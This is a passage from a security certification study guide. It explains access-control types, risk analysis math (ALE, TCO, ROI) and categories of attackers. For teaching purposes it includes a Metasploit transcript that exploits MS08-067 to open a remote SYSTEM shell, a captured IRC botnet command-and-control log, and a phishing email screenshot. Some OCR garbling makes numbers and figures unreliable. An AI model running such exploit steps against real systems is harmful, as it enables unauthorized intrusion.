control. However, by also adding a review of each employee’s Web logs each day, we 
are adding a detective compensating control to augment the administrative control of 
firing an employee who surfs inappropriate Web sites. 


COMPARING ACCESS CONTROLS 

Knowing how to categorize access control examples into the appropriate type and 
category is important. The exam requires that the taker be able to identify types and 
categories of access controls. However, in the real world, remember that controls do 
not always fit neatly into one category: the context determines the category. 


EXAM WARNING 


For control types on the exam, do not memorize examples: instead look for the context. A firewall is 
a clear-cut example of a preventive technical control, and a lock is a good example of a preventive 
physical control. 

Other examples are less clear-cut. What control is an outdoor light? Light allows a guard to see 
an intruder (detective). Light may also deter crime (criminals will favor poorly-lit targets). 

What control is a security guard? The guard could hold a door shut (prevent it from opening), 
or could see an intruder in a hallway (detect the intruder), or the fact that the guard is present 
could deter an attack, etc. In other words, a guard could be almost any control: the context is what 
determines which control the guard fulfills. 


Here are more clear-cut examples: 

• Preventive 

• Physical: Lock, mantrap 

• Technical: Firewall 

• Administrative: Pre-employment drug screening 

• Detective 

• Physical: CCTV, light (used to see an intruder) 

• Technical: IDS 

• Administrative: Post-employment random drug tests 
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• Deterrent 

• Physical: “Beware of dog” sign, light (deterring a physical attack) 

• Technical: Warning Banner presented before a login prompt 

• Administrative: Sanction policy 


RISK ANALYSIS 

All information security professionals assess risk: we do it so often that it becomes 
second nature. A patch is released on a Tuesday. Your company normally tests for 
2 weeks before installing, but a network-based worm is spreading on the Internet that 
infects un-patched systems. If you install the patch now, you risk downtime due to 
lack of testing. If you wait to test, you risk infection by the worm. What is the bigger 
risk? What should you do? Risk Analysis (RA) will help you decide. 

The average person does a poor job of accurately analyzing risk: if you fear the 
risk of dying while traveling, and drive from New York to Florida instead of flying 
to mitigate that risk, you have done a poor job of analyzing risk. It is far riskier, 
per mile, to travel by car than by airplane when considering the risk of death while 
traveling. 

Accurate Risk Analysis is a critical skill for an information security professional. 
We must hold ourselves to a higher standard when judging risk. Our risk decisions 
will dictate which safeguards we deploy to protect our assets, and the amount of 
money and resources we spend doing so. Poor decisions will result in wasted money, 
or even worse, compromised data. 

ASSETS 

Assets are valuable resources you are trying to protect. Assets can be data, systems, 
people, buildings, property, and so forth. The value or criticality of the asset will 
dictate what safeguards you deploy. People are your most valuable asset. 

THREATS AND VULNERABILITIES 

A threat is a potentially harmful occurrence, like an earthquake, a power outage, or a 
network-based worm such as the Conficker (aka Downadup, see http://www. micro- 
soft. com/security/worms/Conficker.aspx) worm, which began attacking Microsoft 
Windows operating systems in late 2008. A threat is a negative action that may harm 
a system. 

A vulnerability is a weakness that allows a threat to cause harm. Examples of 
vulnerabilities (matching our previous threats) are buildings that are not built to 
withstand earthquakes, a data center without proper backup power, or a Microsoft 
Windows XP system that has not been patched in a few years. 

Using the worm example, the threat is the Conficker worm. Conficker spreads 
through three vectors: lack of the MS08-067 patch (see http://technet.microsoft. 


Risk Analysis 


com/en-us/security/bulletin/ms08-067), infected USB tokens that “autorun” when 
inserted into a Windows system, and weak passwords on network shares. 

A networked Microsoft Windows system is vulnerable if it lacks the patch, or 
will automatically run software on a USB token when inserted, or has a network 
share with a weak password. If any of those three conditions are true, you have risk. 
A Linux system has no vulnerability to Conficker, and therefore no risk to Conficker. 


RISK = THREAT x VULNERABILITY 

To have risk, a threat must connect to a vulnerability. This relationship is stated by 
the formula: 


Risk = Threat x Vulnerability 


You can assign a value to specific risks using this formula. Assign a number to 
both threats and vulnerabilities. We will use a range of 1-5 (the range is arbitrary; 
just keep it consistent when comparing different risks). 


LEARN BY EXAMPLE 

Earthquake Disaster Risk Index 

Risk is often counterintuitive. If you ask a layman whether the city of Boston or San Francisco had 
the bigger risk to earthquakes, most would answer “San Francisco.” It is on the California coast near 
the famous Pacific Ocean “Ring of Fire,” and has suffered major earthquakes in the past. Boston is 
in the northeast, which has not suffered a major earthquake since colonial times. 

Rachel Davidson created the Earthquake Disaster Risk Index, which is used to judge risks of 
earthquakes between major world cities. Details are available at: http://www.sciencedaily.com/ 
releases/ 1 997/08/97082 1 233648 .htm. 

She discovered that the risk of earthquakes to Boston and San Francisco was roughly the 
same: “Bostonians face an overall earthquake risk comparable to San Franciscans, despite the 
lower frequency of major earthquakes in the Boston area. The reason: Boston has a much larger 
percentage of buildings constructed before 1975, when the city incorporated seismic safety 
measures into its building code.” [14] 

Compared to Boston, the threat of an earthquake in San Francisco is higher (more frequent 
earthquakes), but the vulnerability is lower (stronger seismic safety building codes). Boston has a 
lower threat (less earthquakes), but a higher vulnerability (weaker buildings). This means the two 
cities have roughly equal risk. 

Using a scale of 1-5, here is San Francisco’s risk, using the risk = threat x vulnerability 
calculation: 

• San Francisco threat: 4 

• San Francisco vulnerability: 2 

• San Francisco risk: 4x2 = 8 
Here is Boston’s risk: 

• Boston threat: 2 

• Boston vulnerability: 4 

• Boston risk: 2x4 = 8 
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IMPACT 

The “Risk = Threat x Vulnerability” equation sometimes uses an added variable 
called impact. “Risk = Threat x Vulnerability x Impact.” Impact is the severity of 
the damage, sometimes expressed in dollars. Risk = Threat x Vulnerability x Cost is 
sometimes used for that reason. A synonym for impact is consequences. 

Let’s use the “impact” formula using the same earthquake risk example for 
buildings in Boston. A company has two buildings in the same office park that are 
virtually identical. One building is full of people and equipment; the other is empty 
(awaiting future growth). The risk of damage from an earthquake to both is 8, using 
“Risk = Threat x Vulnerability.” The impact from a large earthquake is 2 for the empty 
building (potential loss of the building), and 5 for the full building (potential loss of 
human life). Here is the risk calculated using “Risk = Threat x Vulnerability x Impact”: 

• Empty Building Risk: 2 (threat) x 4 (vulnerability) x 2 (impact) =16 

• Full Building Risk: 2 (threat) x 4 (vulnerability) x 5 (impact) = 40 


EXAM WARNING 


Loss of human life has near-infinite impact on the exam. When calculating risk using the 
“Risk = Threat x Vulnerability x Impact” formula, any risk involving loss of human life is 
extremely high, and must be mitigated. 


RISK ANALYSIS MATRIX 

The Risk Analysis Matrix uses a quadrant to map the likelihood of a risk occurring 
against the consequences (or impact) that risk would have. Australia/New Zealand 
ISO 3 1000:2009 Risk Management - Principles and Guidelines (AS/NZS ISO 31000: 
2009, see http://infostore.saiglobal.com/store/Details.aspx?ProductID= 1378670) 
describes the Risk Analysis Matrix, shown in Table 2.4. 

The Risk Analysis Matrix allows you to perform Qualitative Risk Analysis (see 
section “Qualitative and Quantitative Risk Analysis”) based on likelihood (from 
“rare” to “almost certain”) and consequences (or impact), from “insignificant” 
to “catastrophic.” The resulting scores are Low (L), Medium (M), High (H), and 
Extreme Risk (E). Low risks are handled via normal processes; moderate risk require 
management notification; high risks require senior management notification, and 
extreme risks require immediate action including a detailed mitigation plan (and 
senior management notification). 

The goal of the matrix is to identify high likelihood/high consequence risks 
(upper right quadrant of Table 2.4), and drive them down to low likelihood/low 
consequence risks (lower left quadrant of Table 2.4). 

CALCULATING ANNUALIZED LOSS EXPECTANCY 

The Annualized Loss Expectancy (ALE) calculation allows you to determine the 
annual cost of a loss due to a risk. Once calculated, ALE allows you to make informed 
decisions to mitigate the risk. 
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Table 2.4 Risk Analysis Matrix 



Consequences 

Insignificant 

1 

Minor 

2 

Moderate 

3 

Major 

4 

Catastrophic 

5 

Likelihood 

5. Almost 
Certain 

H 

H 

E 

E 

E 

4. Likely 

M 

H 

H 

E 

E 

3. Possible 

L 

M 

H 

E 

E 

2. Unlikely 

L 

L 

M 

H 

E 

1. Rare 

L 

L 

M 

H 

H 


This section will use an example of risk due to lost or stolen unencrypted laptops. 
Assume your company has 1000 laptops that contain Personally Identifiable Infor- 
mation (PII). You are the Security Officer, and you are concerned about the risk of 
exposure of PII due to lost or stolen laptops. You would like to purchase and deploy a 
laptop encryption solution. The solution is expensive, so you need to convince man- 
agement that the solution is worthwhile. 

Asset Value 

The Asset value (AV) is the value of the asset you are trying to protect. In this 
example, each laptop costs $2500, but the real value is the PII. Theft of unencrypted 
PII has occurred previously, and has cost the company many times the value of the 
laptop in regulatory fines, bad publicity, legal fees, staff hours spent investigating, 
etc. The true average Asset Value of a laptop with PII for this example is $25,000 
($2500 for the hardware, and $22,500 for the exposed PII). 

Tangible assets (such as computers or buildings) are straightforward to calcu- 
late. Intangible assets are more challenging. For example, what is the value of brand 
loyalty? According to Deloitte, there are three methods for calculating the value of 
intangible assets - market approach, income approach and cost approach: 

• “Market Approach: This approach assumes that the fair value of an asset reflects 
the price which comparable assets have been purchased in transactions under 
similar circumstances. 

• Income Approach: This approach is based on the premise that the value of 
an ... asset is the present value of the future earning capacity that an asset will 
generate over its remaining useful life. 

• Cost Approach: This approach estimates the fair value of the asset by reference 
to the costs that would be incurred in order to recreate or replace the asset” [15] 
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Table 2.5 Summary of Risk Equations 



Formula 

Description 

Asset Value (AV) 

AV 

Value of the Asset 

Exposure Factor (EF) 

EF 

Percentage of Asset Value Lost 

Single Loss Expectancy (SLE) 

AV x EF 

Cost of One Loss 

Annual Rate of Occurrence (ARO) 

ARO 

Number of Losses per Year 

Annualized Loss Expectancy (ALE) 

SLE x ARO 

Cost of Losses per Year 


Exposure Factor 

The Exposure Factor (EF) is the percentage of value an asset lost due to an incident. 
In the case of a stolen laptop with unencrypted PII, the Exposure Factor is 100%: the 
laptop and all the data are gone. 

Single Loss Expectancy 

The Single Loss Expectancy (SLE) is the cost of a single loss. SLE is the Asset Value 
(AV) times the Exposure Factor (EF). In our case, SLE is $25,000 (Asset Value) 
times 100% (Exposure Factor), or $25,000. 

Annual Rate of Occurrence 

The Annual Rate of Occurrence (ARO) is the number of losses you suffer per year. 
Looking through past events, you discover that you have suffered 1 1 lost or stolen 
laptops per year on average. Your ARO is 1 1 . 

Annualized Loss Expectancy 

The Annualized Loss Expectancy (ALE) is your yearly cost due to a risk. It is cal- 
culated by multiplying the Single Loss Expectancy (SLE) times the Annual Rate of 
Occurrence (ARO). In our case, it is $25,000 (SLE) times 1 1 (ARO), or $275,000. 
Table 2.5 summarizes the equations used to determine Annualized Loss Expectancy. 

TOTAL COST OF OWNERSHIP 

The Total Cost of Ownership (TCO) is the total cost of a mitigating safeguard. 
TCO combines upfront costs (often a one-time capital expense) plus annual cost of 
maintenance, including staff hours, vendor maintenance fees, software subscriptions, 
etc. These ongoing costs are usually considered operational expenses. 

Using our laptop encryption example, the upfront cost of laptop encryption soft- 
ware is $100/laptop, or $100,000 for 1000 laptops. The vendor charges a 10% annual 
support fee, or $ 10,000/year. You estimate that it will take 4 staff hours per laptop 
to install the software, or 4000 staff hours. The staff that will perform this work 
makes $50/hour plus benefits. Including benefits, the staff cost per hour is $70, times 
4000 hours, that is $280,000. 
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Table 2.6 Annualized Loss Expectancy of Unencrypted Laptops 



Formula 

Value 

Asset Value (AV) 

AV 

$25,000 

Exposure Factor (EF) 

EF 

100% 

Single Loss Expectancy (SLE) 

AV x EF 

$25,000 

Annual Rate of Occurrence (ARO) 

ARO 

11 

Annualized Loss Expectancy (ALE) 

SLE x ARO 

$275,000 


Your company uses a 3-year technology refresh cycle, so you calculate the Total 
Cost of Ownership over 3 years: 

• Software cost: $100,000 

• Three year’s vendor support: $10,000 x 3 = $30,000 

• Hourly staff cost: $280,000 

• Total Cost of Ownership over 3 years: $410,000 

• Total Cost of Ownership per year: $410,000/3 = $136,667/year 

Your Annual Total Cost of Ownership for the laptop encryption project is 
$136,667 per year. 

RETURN ON INVESTMENT 

The Return on Investment (ROI) is the amount of money saved by implementing a 
safeguard. If your annual Total Cost of Ownership (TCO) is less than your Annualized 
Loss Expectancy (ALE), you have a positive ROI (and have made a good choice). If 
the TCO is higher than your ALE, you have made a poor choice. 

The annual TCO of laptop encryption is $136,667; the Annualized Loss Expectancy 
for lost or stolen unencrypted laptops is $275,000. The math is summarized in Table 2.6. 

Implementing laptop encryption will change the Exposure Factor. The lap- 
top hardware is worth $2500, and the exposed PII costs an additional $22,500, for 
$25,000 Asset Value. If an unencrypted laptop is lost or stolen, the exposure factor 
is 100% (the hardware and all data is exposed). Laptop encryption mitigates the PII 
exposure risk, lowering the exposure factor from 100% (the laptop and all data) to 
10% (just the laptop hardware). 

The lower Exposure Factor lowers the Annualized Loss Expectancy from 
$275,000 to $27,500, as shown in Table 2.7. 

You will save $247, 500/year (the old ALE, $275,000, minus the new ALE, 
$27,500) by making an investment of $136,667. Your ROI is $110,833 per year 
($247,500 minus $136,667). The laptop encryption project has a positive ROI, and 
is a wise investment. 
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Table 2.7 Annualized Loss Expectancy of Encrypted Laptops 



Formula 

Value 

Asset Value (AV) 

AV 

$25,000 

Exposure Factor (EF) 

EF 

10% 

Single Loss Expectancy (SLE) 

AV x EF 

$2,500 

Annual Rate of Occurrence (ARO) 

ARO 

11 

Annualized Loss Expectancy (ALE) 

SLE x ARO 

$27,500 


BUDGET AND METRICS 

When combined with Risk Analysis, the Total Cost of Ownership and Return on 
Investment calculations factor into proper budgeting. Some organizations have the 
enviable position of ample information security funding, yet they are often compro- 
mised. Why? The answer is usually because they mitigated the wrong risks. They 
spent money where it may not have been necessary, and ignored larger risks. Regard- 
less of staff size or budget, all organizations can take on a finite amount of informa- 
tion security projects. If they choose unwisely, information security can suffer. 

Metrics can greatly assist the information security budgeting process. They help 
illustrate potentially costly risks, and demonstrate the effectiveness (and potential 
cost savings) of existing controls. They can also help champion the cause of 
information security. 

The CIS Security Benchmarks (available at: http://benchmarks.cisecurity.org/ 
en-us/?route=downloads. metrics) lists the following metrics: 

• “Application Security 

• Number of Applications 

• Percentage of Critical Applications 

• Risk Assessment Coverage 

• Security Testing Coverage 

• Configuration Change Management 

• Mean-Time to Complete Changes 

• Percent of Changes with Security Review 

• Percent of Changes with Security Exceptions 

• Financial 

• Information Security Budget as % of IT Budget 

• Information Security Budget Allocation 

• Incident Management 

• Mean-Time to Incident Discovery 

• Incident Rate 

• Percentage of Incidents Detected by Internal Controls 

• Mean-Time Between Security Incidents 

• Mean-Time to Recovery 
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• Patch Management 

• Patch Policy Compliance 

• Patch Management Coverage 

• Mean-Time to Patch 

• Vulnerability Management 

• Vulnerability Scan Coverage 

• Percent of Systems Without Known Severe Vulnerabilities 

• Mean-Time to Mitigate Vulnerabilities 

• Number of Known Vulnerability Instances” [16] 


RISK CHOICES 

Once we have assessed risk, we must decide what to do. Options include accepting 
the risk, mitigating or eliminating the risk, transferring the risk, and avoiding the risk. 

Accept the Risk 

Some risks may be accepted: in some cases, it is cheaper to leave an asset unprotected 
due to a specific risk, rather than make the effort (and spend the money) required to 
protect it. This cannot be an ignorant decision: the risk must be considered, and all 
options must be considered before accepting the risk. 


LEARN BY EXAMPLE 

Accepting the Risk 

A company conducted a Risk Analysis, which identified a mainframe as a source of risk. The 
mainframe was no longer used for new transactions; it served as an archive for historical data. The 
ability to restore the mainframe after a disk failure had eroded over time: hardware aged, support 
contracts expired and were not renewed, and employees who were mainframe subject matter experts 
left the company. The company was not confident it could restore lost data in a timely fashion, if at all. 

The archival data needed to be kept online for 6 more months, pending the installation of a new 
archival system. What should be done about the backups in the meantime? Should the company buy new 
mainframe restoration hardware, purchase support contracts, or hire outsourced mainframe experts? 

The risk management team asked the team supporting the archive retrieval, “What would 
happen if this data disappeared tomorrow, 6 months before the new archival system goes live?” 

The answer: the company could use paper records in the interim, which would represent a small 
operational inconvenience. No laws or regulations prohibited this plan. 

The company decided to accept the risk of failing to restore the archival data due to a mainframe 
failure. Note that this decision was well thought out. Stakeholders were consulted, the operational 
impact was assessed, and laws and regulations were considered. 


Risk Acceptance Criteria 

Low likelihood/low consequence risks are candidates for risk acceptance. High 
and extreme risks cannot be accepted. There are cases, such as data protected by 
laws or regulations or risk to human life or safety, where accepting the risk is not 
an option. 
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Mitigate the Risk 

Mitigating the risk means lowering the risk to an acceptable level. Lowering risk is 
also called “risk reduction,” and the process of lowering risk is also called “reduction 
analysis.” The laptop encryption example given in the previous Annualized Loss 
Expectancy section is an example of mitigating the risk. The risk of lost PII due to 
stolen laptops was mitigated by encrypting the data on the laptops. The risk has not 
been eliminated entirely: a weak or exposed encryption password could expose the 
PII, but the risk has been reduced to an acceptable level. 

In some cases it is possible to remove the risk entirely: this is called eliminating 
the risk. 

Transfer the Risk 

Transferring the risk is sometimes referred to as the “insurance model.” Most people 
do not assume the risk of fire to their house: they pay an insurance company to 
assume that risk for them. The insurance companies are experts in Risk Analysis: 
buying risk is their business. If the average yearly monetary risk of fire to 1000 homes 
is $500,000 ($500/house), and they sell 1000 fire insurance policies for $600/year, 
they will make 20% profit. That assumes the insurance company has accurately 
evaluated risk, of course. 

Risk Avoidance 

A thorough Risk Analysis should be completed before taking on a new project. If the 
Risk Analysis discovers high or extreme risks that cannot be easily mitigated, avoid- 
ing the risk (and the project) may be the best option. 

The math for this decision is straightforward: calculate the Annualized Loss 
Expectancy of the new project, and compare it with the Return on Investment 
expected due to the project. If the ALE is higher than the ROI (even after risk 
mitigation), risk avoidance is the best course. There may also be legal or regulatory 
reasons that will dictate avoiding the risk. 


LEARN BY EXAMPLE 

Avoiding the Risk 

A company sells Apple iPods online. For security reasons, repeat customers must reenter their credit 
numbers for each order. This is done to avoid the risk of storing credit card numbers on an Internet- 
facing system (where they may be more easily stolen). 

Based on customer feedback, the business unit proposes a “save my credit card information” 
feature for repeat customers. A Risk Analysis of the new feature is conducted once the project is 
proposed. The business unit also calculates the Return on Investment for this feature. 

The Risk Analysis shows that the information security architecture would need significant 
improvement to securely protect stored credit card information on Internet-facing systems. Doing 
so would also require more stringent Payment Card Industry (PCI) auditing, adding a considerable 
amount of staff hours to the Total Cost of Ownership (TCO). 

The TCO is over double the ROI of the new feature, once all costs are tallied. The company 
decides to avoid the risk and not implement the credit card saving feature. 



Risk Analysis 


QUANTITATIVE AND QUALITATIVE RISK ANALYSIS 

Quantitative and Qualitative Risk Analysis are two methods for analyzing risk. Quan- 
titative Risk Analysis uses hard metrics, such as dollars. Qualitative Risk Analysis 
uses simple approximate values. Quantitative is more objective; qualitative is more 
subjective. Hybrid Risk Analysis combines the two: using quantitative analysis for 
risks which may be easily expressed in hard numbers such as money, and qualitative 
for the remainder. 


EXAM WARNING 


Quantitative Risk Analysis requires you to calculate the quantity of the asset you are protecting. 
Quantitative-quantity is a hint to remember this for the exam. 


Calculating the Annualized Loss Expectancy (ALE) is an example of Quantita- 
tive Risk Analysis. The inputs for ALE are hard numbers: Asset Value (in dollars), 
Exposure Factor (as a percentage) and Annual Rate of Occurrence (as a hard 
number). 

The Risk Analysis Matrix (shown previously in Table 2.4) is an example of 
Qualitative Risk Analysis. Likelihood and Consequences are rough (and sometimes 
subjective) values, ranging from 1 to 5. Whether the consequences of a certain risk 
are a “4” or a “5” can be a matter of (subjective) debate. 

Quantitative Risk Analysis is more difficult: to quantitatively analyze the risk of 
damage to a data center due to an earthquake, you would need to calculate the asset 
value of the data center: the cost of the building, the servers, network equipment, 
computer racks, monitors, etc. Then calculate the Exposure Factor, and so on. 

To qualitatively analyze the same risk, you would research the risk, and agree that 
the likelihood is a 2, and the consequences are a 4, and use the Risk Analysis matrix 
to determine a risk of “high.” 


THE RISK MANAGEMENT PROCESS 

The United States National Institute of Standards and Technology (NIST) published 
Special Publication 800-30, Risk Management Guide for Information Technology 
Systems (see http://csrc.nist.gov/publications/nistpubs/800-30/sp800-30.pdf). The 
guide describes a 9-step Risk Analysis process: 

1 . System Characterization 

2 . Threat Identification 

3 . Vulnerability Identification 

4 . Control Analysis 

5 . Likelihood Determination 
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6 . Impact Analysis 

7. Risk Determination 

8 . Control Recommendations 

9. Results Documentation 

We have covered these steps individually; let us end this section by following 
NIST’s process. 

System characterization describes the scope of the risk management effort and 
the systems that will be analyzed. The next two steps, Threat Identification and Vul- 
nerability Identification, identify the threats and vulnerabilities, required to identify 
risks using the “Risk = Threat x Vulnerability” formula. 

Step 4, Control Analysis, analyzes the security controls (safeguards) that are 
in place or planned to mitigate risk. Steps 5 and 6, Likelihood Determination and 
Impact Analysis, are needed to identify important risks (especially those with the 
high likelihood and high impact/consequence). 

The previous 7 steps are used to determine Control Recommendations, or the 
risk mitigation strategy. That strategy is documented in the final step, Results 
Documentation. 


TYPES OF ATTACKERS 

Controlling access is not just controlling authorized users; it includes preventing 
unauthorized access. Information systems may be attacked by a variety of attackers, 
ranging from script kiddies to worms to militarized attacks. Attackers may use a 
variety of methods to attempt to compromise the confidentiality, integrity, and avail- 
ability of systems. 


HACKERS 

The term “hacker” is often used in the media to describe a malicious individual 
who attacks computer systems. The term hacker originally described a non-mali- 
cious explorer who used technologies in ways its creators did not intend. The first 
definition of a hacker from a 1981 version of the Jargon File (see http://www.catb. 
org/jargon/) is: “HACKER [originally, someone who makes furniture with an axe] 
n. 1. A person who enjoys exploring the details of programming systems and how 
to stretch their capabilities, as opposed to most users who prefer to learn only the 
minimum necessary.”[17] The term “how to stretch their capabilities” is key: the 
original “hackers” were experts at pushing the bounds of technology, and enjoyed 
doing so. 

The eighth definition of hacker from the same version of the Jargon File refer- 
ences malice: “A malicious or inquisitive meddler who tries to discover information 
by poking around. Hence ‘password hacker’, ‘network hacker’ .”[18] 


Types of Attackers 


While some simply use the term “hacker” to now describe a malicious computer 
attacker, better terms include “malicious hacker,” or “ black hat.” “ Cracker ” is 
another, sometimes controversial, commonly used term used for a malicious hacker. 
The issue is the term cracker, which also applies to cracking software copy protection, 
cracking password hashes, and is also a derogative racial term. 

BLACK HATS AND WHITE HATS 

Black hat attackers are malicious hackers, sometimes called crackers. The “black” 
derives from villains in fiction: Darth Vader wore all black. Black hats lack ethics, 
sometimes violate laws, and break into computer systems with malicious intent, and 
may violate the confidentiality, integrity, or availability of organizations’ systems 
and data. 

White hat hackers are the “good guys,” including professional penetration testers 
who break into systems with permission, malware researches who research mali- 
cious code to provide better understanding and ethically disclose vulnerabilities to 
vendors, etc. White hat hackers are also known as ethical hackers; they follow a code 
of ethics and obey laws. The name derives from fictional characters who wore white 
hats, like “Gandalf the White.” 

Finally, gray hat hackers (sometimes spelled with the British “grey,” even 
outside of the UK) fall somewhere between black and white hats. According to 
searchsecurity.com, “Gray hat describes a cracker (or, if you prefer, hacker) who 
exploits a security weakness in a computer system or product in order to bring 
the weakness to the attention of the owners. Unlike a black hat, a gray hat acts 
without malicious intent. The goal of a gray hat is to improve system and network 
security. However, by publicizing a vulnerability, the gray hat may give other 
crackers the opportunity to exploit it. This differs from the white hat who alerts 
system owners and vendors of a vulnerability without actually exploiting it in 
public. ”[19] 

SCRIPT KIDDIES 

Script kiddies attack computer systems with tools they have little or no understand- 
ing of. Modern exploitation tools, such as the Metasploit Framework (http://www. 
metasploit.com/), are of high quality and so easy to use that security novices can 
successfully compromise some systems. 


NOTE 

The fact that script kiddies use tools such as Metasploit is not meant to infer anything negative 
about the tools. These tools are of high quality, and that quality allows novices to sometimes 
achieve impressive results. An older Metasploit slogan (“Point. Click. Root.”) illustrates 
this fact. 
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root@ubuntu: 


File Edit View Terminal Help 


msf 

msf > use exploit/windows/smb/ms08 067 netapi 

msf exploit (ms08_067_netapi) > 

msf exploit (ms08_067 netapi) > set PAYLOAD windows/shell/bind 

PAYLOAD => windows/shell/bindtcp 
msf exploit (ms08_067_netapi) 



msf exploit (ms08_067_netapi) 
RHOST => 192.168.178.136 
msf exploit (ms08_067_netapi) 
msf exploit (ms08_067_netapi) 


> set RHOST 192.168.178.136 


exploit 


X±J 


[*] Started bind handler 
[*] Automatically detecting the target... 

[*] Fingerprint: Windows XP Service Pack 0 / 1 - lang: English 
[*) Selected Target: Windows XP SP0/SP1 Universal 
[*] Triggering the vulnerability... 

[*] Sending stage (240 bytes) 

[*] Command shell session 2 opened (192.168.178.130:52944 -> 192.168.178.136:444 

k) 

Microsoft Windows XP (Version 5.1.26O0] 

(C) Copyright 1985-2001 Microsoft Corp. 


C : \WIND0WS\system32>| 


a 


FIGURE 2.1 1 Using Metasploit to Own a System in 4 Steps 


In the case of Metasploit, exploiting a system may take as few as four steps. 
Assume a victim host is a Microsoft XP system that is missing patch MS08-067. 
Gaining a remote SYSTEM-level shell is as simple as: 

1 . Choose the exploit (MS08-067) 

2. Choose the payload (run a command shell) 

3. Choose the remote host (victim IP address) 

4. Type “exploit” 

The attacker then types “exploit” and, if successful, accesses a command shell 
running with SYSTEM privileges on the victim host. Figure 2.11 shows this process 
within Metasploit. 

While script kiddies are not knowledgeable or experienced, they may still cause 
significant security issues for poorly protected systems. 

OUTSIDERS 

Outsiders are unauthorized attackers with no authorized privileged access to a system 
or organization. The outsider seeks to gain unauthorized access. Outsiders launch the 
majority of attacks, but most are usually mitigated by defense-in-depth perimeter 
controls. 



Types of Attackers 


INSIDERS 

An insider attack is launched by an internal user who may be authorized to use the 
system that is attacked. An insider attack may be intentional or accidental. Insider 
attackers range from poorly trained administrators who make mistakes, to malicious 
individuals who intentionally compromise the security of systems. An authorized 
insider who attacks a system may be in a position to cause significant impact. 

NIST Special Publication 800-30 (http://csrc.nist.gov/publications/nist- 
pubs/800-30/sp800-30.pdf) lists the following threat actions caused by insider 
attackers: 

• Assault on an employee 

• Blackmail 

• Browsing of proprietary information 

• Computer abuse 

• Fraud and theft 

• Information bribery 

• Input of falsified, corrupted data 

• Interception 

• Malicious code (e.g., virus, logic bomb, Trojan horse) 

• Sale of personal information 

• System bugs 

• System intrusion 

• System sabotage 

• Unauthorized system access [20] 

Insiders cause most high-impact security incidents. This point is sometimes 
debated: most attacks are launched by outside attackers. Defense-in-depth mitigates 
most outside attacks: Internet-facing firewalls may deny thousands of attacks or 
more per day. Most successful attacks are launched by insiders. 

HACKTIVIST 

A hacktivist is a hacker activist, someone who attacks computer systems for politi- 
cal reasons. “Hacktivism” is hacking activism. There have been many recent cases 
of hacktivism, including the DDoS on the Internet infrastructure in the country of 
Estonia in reaction to the plan to move a Soviet-era statue in Tallinn, Estonia. See 
http://www.wired.com/politics/security/magazine/15-09/ff_estonia for more infor- 
mation on this attack. 

In March of 20 1 0, Google came under attack by V ietnamese hacktivists . The sto- 
ry, reported in The Register (“Google frets over Vietnam hacktivist botnet,” http:// 
www.theregister.co.uk/2010/03/31/vietnam_botnet/) said “Hackers used malware 
to establish a botnet in Vietnam as part of an apparently politically motivated attack 
with loose ties to the Operation Aurora attacks that hit Google and many other blue 
chip firms late last year, according to new research from McAfee and Google. ”[21] 
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PRIVMSG #trees :.4.New Infection - Morpheous Stub 

:pLagUe{USA}{LAN}72705 ! pl_agUe@rrcs-24-39-®-l^. nys. biz. rr. com JOIN :#trees 

:irc. 1ulz.ee 332 pLagUe{USA}{LAN}72705 #trees :!msnoff |!msn . voc.!?!? http ://oheni^fc. com/ct/i mage. php? 
foto= 

:i rc.1u1z.ee 333 pLagUe{USA}{LAN}72705 #trees C 1259895708 

:pl_agUe{BRA}97330! pl_agUe@201-0-15-192. dsl . telesp. net. br PRIVMSG #trees :.4.{. USB. 4 }.. Injected Virus 
into .4.autorun.inf.. on drive. 4. J: 

MODE pLagUe{USA}{LAN}72705 -ix 
JOIN #trees 
JOIN #trees 

MODE pLagUe{USA}{LAN}72705 -ix 
JOIN #trees 
JOIN #trees 

MODE pLagUe{USA}{LAN}72705 -ix 
JOIN #trees 
JOIN #trees 
PRIVMSG #trees : 

rirc.1u1z.ee 412 pLagUe{USA}{LAN}72705 :No text to send 
PRIVMSG #trees : 

rirc.1u1z.ee 412 pLagUe{USA}{LAN}72705 :No text to send 

r pLagUe{BRA}60340 ! pl_agUe@189. 105 . 218 . 136 PRIVMSG #trees r.4.{. USB. 4 }.. Injected Virus 
into . 4. autorun. inf . . on drive. 4. G: 

rpLagUe{MEX}49529! SkuZ@189.178. 216. 70 PRIVMSG #trees r.4.{. USB. 4 }.. Injected Virus 
into . 4. autorun. inf. . on drive. 4. K: 

rpLagUe{USA}85675!pLagUe@200.4.161.79 PRIVMSG #trees r.4.{. USB. 4 }.. Injected Virus 

FIGURE 2.12 IRC botnet Command and Control Traffic 


Google reported: “The malware infected the computers of potentially tens of 
thousands of users. . .These infected machines have been used both to spy on their 
owners as well as participate in distributed denial of service (DDoS) attacks against 
blogs containing messages of political dissent. Specifically, these attacks have 
tried to squelch opposition to bauxite mining efforts in Vietnam, an important and 
emotionally charged issue in the country. ”[22] 

BOTS AND BOTNETS 

A (short for robot) is a computer system running malware that is controlled via 
a botnet. A botnet contains a central command and control (C&C) network, managed 
by humans called hot herders. The term “ zombie ” is sometimes used to describe a hot. 

Many botnets use Internet Relay Chat (IRC) networks to provide command and 
control; others use HTTP, HTTPS, or proprietary protocols (sometimes obscured or 
encrypted). Figure 2.12 shows a packet capture of bot IRC command and control 
traffic, connecting to the “pLagUe” botnet, displayed with the Wireshark network 
protocol analyzer (see http://www.wireshark.org). 

The bot in Figure 2.12 (called pLagUe{USA}{LAN}72705, indicating it is in the 
United States) reports to the C&C network. Other bots report in from Brazil (BRA), 
Mexico (MEX), and the United States. They report injecting viruses into autorun. inf: 
they are most likely infecting attached USB drives with viruses. 

Systems become bots after becoming compromised via a variety of mechanisms, 
including server-side attacks, client-side attacks, and running Remote Access Trojans 
(RATs). As described in Domain 3: Security Engineering, a Trojan horse program 
performs two functions, one overt (such as playing a game) and one covert (such as 
joining the system to a botnet). 

Once joined to a botnet, the bot may be instructed to steal local information such 
as credit card numbers or credentials for other systems, including online banks. Bots 
also send spam, host illicit Web sites including those used by drug-sale spam, and are 
used in coordinated Distributed Denial of Service (DDoS) attacks. 


Types of Attackers 


Important notification - Read carefully Spam | X exotope | X 

Business Banking Support Service to eric show details Mar 31 (5 days ago) Reply ▼ 


Warning: This message may not be from whom it claims to be. Beware of following any links in it or of providing the sender 
with any personal information. 


PNC 

LEADING THE WAY 


All PNC Bank Business Customers, 

We notify you that the sign on process to PINACLE Express is changing. 
The updates will be applied at the begining of April. 

We recommend you to look through the DEMO to avoid possible access 
problems in future. 

This is an automated message. Please, don't reply. 


Sincerely, PNC Bank Administration 


Copyright 2010, The PMC Financial Services Group, Inc. All Rights Reserved 


